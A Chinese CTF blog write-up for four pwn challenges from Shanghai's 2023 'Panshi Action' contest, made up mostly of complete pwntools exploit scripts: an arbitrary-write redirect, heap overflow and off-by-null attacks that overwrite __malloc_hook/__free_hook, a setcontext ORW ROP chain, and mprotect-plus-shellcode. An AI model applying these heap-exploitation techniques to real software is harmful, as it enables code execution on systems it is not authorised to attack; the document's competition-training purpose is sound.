2023上海“磐石行动”pwn wp

KingKi1L3r

已于 2023-05-23 18:14:43 修改

阅读量497

点赞数 4

文章标签：安全 python

于 2023-05-23 18:04:14 首次发布

本文链接：https://blog.csdn.net/m0_63437215/article/details/130831760

版权

Changeaddr

任意地址写，控制程序执行getflag函数

from pwn import *
context.log_level='debug'
#r=process("./ChangeAddr")
r=remote('116.236.144.37',28526)
r.recvuntil("Now you can write one 4 byte value to memory. Where would you like to write?")
r.sendline("0804C01C")
r.recvuntil("?")
r.sendline("0804932C")
r.recvuntil("segment fault!")
#gdb.attach(r)
r.sendline("aaaaaa4564564aaadddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd")
r.interactive()

Keybox

2.23堆溢出

from pwn import *
context.log_level='debug'
r=process('./KeyBox')
elf=ELF('./KeyBox')
libc=elf.libc

r.sendlineafter("Input the first key: ",str(-0x1fffffffffFFFFF4))
r.sendlineafter("Input the second key: ",'1')

def show():
    r.sendlineafter("Your choice:",'1')

def add(size,content):
    r.sendlineafter("Your choice:",'2')
    r.sendlineafter("Please enter the length of the item:",str(size))
    r.sendafter("Please enter the name of item:",content)
def edit(idx,size,content):
    r.sendlineafter("Your choice:",'3')
    r.sendlineafter("Please enter the index of item:",str(idx))
    r.sendlineafter("Please enter the length of item:",str(size))
    r.sendlineafter("Please enter the new name of the item:",content)
def delete(idx):
    r.sendlineafter("Your choice:",'4')
    r.sendlineafter("Please enter the index of item:",str(idx))



add(0x10,'a'*0x10)#0
add(0x10,'c'*0x10)#1
add(0x20,'a')#2
add(0x68,'a')#3
add(0x20,'a')#4
add(0x68,'a')#5
add(0x68,'a')#6

edit(0,0x30,b'a'*0x10+p64(0)+p64(0xf1))
delete(1)
add(0x10,'a')#1
show()
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-88-0x10-libc.sym['__malloc_hook']
print("libc_base------------>",hex(libc_base))
malloc_hook=libc_base+libc.sym['__malloc_hook']-0x23
system=libc_base+libc.sym['system']
add(0xc1,'a')

delete(6)
edit(5,0xf0,b'a'*0x68+p64(0x71)+p64(malloc_hook))
add(0x68,'/bin/sh\x00')#6
add(0x68,b'a'*0x13+p64(0x401765))
r.sendlineafter("Your choice:",'2')
r.sendlineafter("Please enter the length of the item:",str(0x20))

# gdb.attach(r)
r.interactive()

ssql

程序实现了用堆块进行数据库管理，一共有申请，释放，编辑，打印四个功能。首先是创建table，然后每个table可以创建多个column，需要逆向出数据库这四个功能的对应语句结构，才能使用这四个功能。

漏洞点就是edit函数的strcpy末尾多加\x00，造成offbynull。

通过溢出0字节，可以改堆块指针，同时在对应的地方伪造一个chunk造成堆块重叠。

from pwn import *
context.log_level='debug'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc

def add(idx):
    r.sendafter("mysql > ",'CREATE TABLE {}'.format(idx))

def delete(idx):
    r.sendafter("mysql > ",'DELETE TABLE {}'.format(idx))

def show(idx):
    r.sendafter("mysql > ",'SHOW  TABLE {}'.format(idx))



def add_c(c,idx):
    r.sendafter("mysql > ",'CREATE {} TABLE {}'.format(c,idx))

def delete_c(c,idx):
    r.sendafter("mysql > ",'DELETE {} FROM {}'.format(c,idx))

def edit_c(c,idx,name,content):
    r.sendafter("mysql > ",'EDIT {} FROM {}'.format(c,idx))
    r.sendafter("Column name:",name)
    r.sendafter("Column Content: ",content)

#----------------leak_heap-----------------
add(1)
add_c(0,1)
add_c(1,1)
delete_c(1,1)
delete_c(0,1)
add_c(0,1)
show(1)
r.recvuntil("Column Content: ")
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x470
print("heap_base------------>",hex(heap_base))


#---------------------leak_libc-----------------
for i in range(6):
    add_c(i+1,1)
payload=b'\x00'*0xc0+p64(0)+p64(0x541)+p64(0x31)+p64(0)+p64(heap_base+0x400)
edit_c(0,1,b'a'*0x10,payload)
delete(1)
add(1)
add_c(0,1)
add_c(1,1)
show(1)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x10-96-libc.sym['__malloc_hook']
print("libc_base----------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
one_gadget=[0xe3afe,0xe3b01,0xe3b04]
ogg=libc_base+one_gadget[1]
add_c(2,1)
add_c(3,1)
edit_c(0,1,b'a'*0x10,b'b'*0xc0+p64(0)+p64(0x31)*2+p64(0)+p64(heap_base+0x540)+p64(heap_base+0x300)+p64(heap_base+0x590))
edit_c(2,1,b'a'*7,b'\x00'*0x10+p64(heap_base+0x590)+p64(0x111))
delete(1)
add(1)
add_c(0,1)
add_c(1,1)

edit_c(1,1,b'a'*7,p64(0)*3+p64(0x111)+p64(free_hook))
add_c(2,1)
add_c(3,1)
edit_c(3,1,b'a'*0x10,p64(ogg))
delete(1)
# gdb.attach(r)
r.interactive()

hp

这个题主要是逆向难度大，需要逆向出堆块申请等功能对应的语句，不过跟http协议头有点类似。

首先要调用login函数让dword_5280=1，然后才能执行其他功能。

漏洞点在edit函数中有一个offbynull

由于这个题有沙箱，因此需要orw读取flag。

思路1：先改freehook为setcontext，然后在对应堆块中写orw链并执行。

思路2：改freehook为setcontext，然后执行mprotect将heap段权限改为7，然后在对应堆块里写shellcode：开辟内存写flag，调用32位open，rw。

exp1

from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc
def login():
    payload='POST /login HTTP/1.0 \nUsername:'+'a'*0x20+'\x01\n'+'Password:aaaa\r\n\n'
    r.sendafter("parser> ",payload)
def add(cont):
    payload='POST /create HTTP/1.0 \nContent-Length:'+str(len(cont)-1)+'\r\n\r\n'+cont
    r.sendafter("parser> ",payload)
def delete(idx):
    payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'
    r.sendafter("parser> ",payload)
def show(idx):
    payload='POST /show HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'
    r.sendafter("parser> ",payload)
def edit(idx,cont):
    payload='POST /edit HTTP/1.0 \nIdx:' + str(idx) +'\n'+"Content-Length:"+str(len(cont)-1)+'\r\n\r\n'+cont
    r.sendafter("parser> ",payload)

#------------leak----------------------#
login()
add('a'*0x440)#0
add('a'*2)#1
delete(0)
add('a'*0x18)#0
show(0)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
r.recv(10)
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250
print("heap_base----------->",hex(heap_base))
pop_rax_ret = libc_base + 0x000000000001b500
pop_rdi_ret= libc_base + 0x000000000002164f
pop_rsi_ret = libc_base + 0x0000000000023a6a
pop_rdx_ret = libc_base + 0x0000000000001b96
syscall_ret = libc_base + 0x00000000000d2625
open_=libc_base+libc.sym['open']
add('a'*0x420)#2
add('a'*0x439)#3
for i in range(3):#456
    add('a'*0x109)

add('a'*0x4f0)#7
add('c'*0x20)#8
edit(6,'a'*0x108+'\x01')
for i in range(8,-1,-1):
    edit(6,'a'*(0x100+i)+'\x01')
edit(6,'a'*0x101+p16(0x440+0x330).decode())
delete(3)
delete(7)
add('a'*0x400)#3
delete(4)
add('b'*0x50)#4
edit(4,'a'*0x31+p64(free_hook)[0:6])
add('a'*0x109)#7
add('b'*0x109)#9
edit(9,'a'+p64(setcontext+53)[0:6])
add('b'*0x500)#10


flag_addr=heap_base+0xb40
data=free_hook+0x100
orw={
    0x98:{
        0x0:heap_base+0xc40,
        0x8:pop_rdi_ret+1
    },
    0xf8:{
    0x0:[
            pop_rdi_ret,
            flag_addr,
            pop_rsi_ret,
            0,
            open_,
 
            pop_rax_ret,  # sys_read(flag_fd, heap, 0x100)
            0,
            pop_rdi_ret,
            3,
            pop_rsi_ret,
            heap_base+0x200,
            pop_rdx_ret,
            0x40,
            syscall_ret,
 
            pop_rax_ret,  # sys_write(1, heap, 0x100)
            1,
            pop_rdi_ret,
            1,
            pop_rsi_ret,
            heap_base+0x200,
            pop_rdx_ret,
            0x40,
            syscall_ret
        ]
    }

}

payload='flag\x00\x00\x00\x00'+flat(orw)


i = len(payload) - 1
while i >= 0:
    if payload[i] == '\x00':
        edit(10,'a'+ 'b' * i)
        i = i - 1
    else:
        j = i
        while payload[j] != '\x00':
            j = j - 1
        edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])
        i = j
gdb.attach(r)
delete(10)

r.interactive()

exp2

from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc
def login():
    payload='POST /login HTTP/1.0 \nUsername:'+'a'*0x20+'\x01\n'+'Password:aaaa\r\n\n'
    r.sendafter("parser> ",payload)
def add(cont):
    payload='POST /create HTTP/1.0 \nContent-Length:'+str(len(cont)-1)+'\r\n\r\n'+cont
    r.sendafter("parser> ",payload)
def delete(idx):
    payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'
    r.sendafter("parser> ",payload)
def show(idx):
    payload='POST /show HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'
    r.sendafter("parser> ",payload)
def edit(idx,cont):
    payload='POST /edit HTTP/1.0 \nIdx:' + str(idx) +'\n'+"Content-Length:"+str(len(cont)-1)+'\r\n\r\n'+cont
    r.sendafter("parser> ",payload)

#------------leak----------------------#
login()
add('a'*0x440)#0
add('a'*2)#1
delete(0)
add('a'*0x18)#0
show(0)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
mprotect=libc_base+libc.sym['mprotect']
r.recv(10)
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250
print("heap_base----------->",hex(heap_base))

add('a'*0x420)#2
add('a'*0x439)#3
for i in range(3):#456
    add('a'*0x109)

add('a'*0x4f0)#7
add('c'*0x20)#8
edit(6,'a'*0x108+'\x01')
for i in range(8,-1,-1):
    edit(6,'a'*(0x100+i)+'\x01')
edit(6,'a'*0x101+p16(0x440+0x330).decode())
delete(3)
delete(7)
add('a'*0x400)#3
delete(4)
add('b'*0x50)#4
edit(4,'a'*0x31+p64(free_hook)[0:6])
add('a'*0x109)#7
add('b'*0x109)#9
edit(9,'a'+p64(setcontext+53)[0:6])
add('b'*0x500)#10

frame=SigreturnFrame()
frame.rdi=heap_base
frame.rsi=0x1000
frame.rdx=0x7
frame.rip=mprotect
frame.rsp=heap_base+0xc38

shellcode='''
        mov rax, 192     
        mov rbx, 0x400000
        mov rcx, 0x1000
        mov rdx, 7
        mov rsi, 0x100022
        mov rdi, 0
        int 0x80

        mov rsp, 0x400108
        push 0x67616c66

        mov rax, 5       
        mov rbx, 0x400100
        mov rcx, 0
        mov rdx, 0
        int 0x80

        mov rdi, 3  
        mov rax, 0
        mov rsi, rsp
        mov rdx, 0x50
        syscall

        mov rax,1          
        mov rdi,1
        syscall

'''

payload = str(frame)+p64(heap_base+0xc40)+asm(shellcode,arch='amd64')
i = len(payload) - 1
while i >= 0:
    if payload[i] == '\x00':
        edit(10,'a'+ 'b' * i)
        i = i - 1
    else:
        j = i
        while payload[j] != '\x00':
            j = j - 1
        edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])
        i = j
gdb.attach(r)
delete(10)
r.interactive()

执行得flag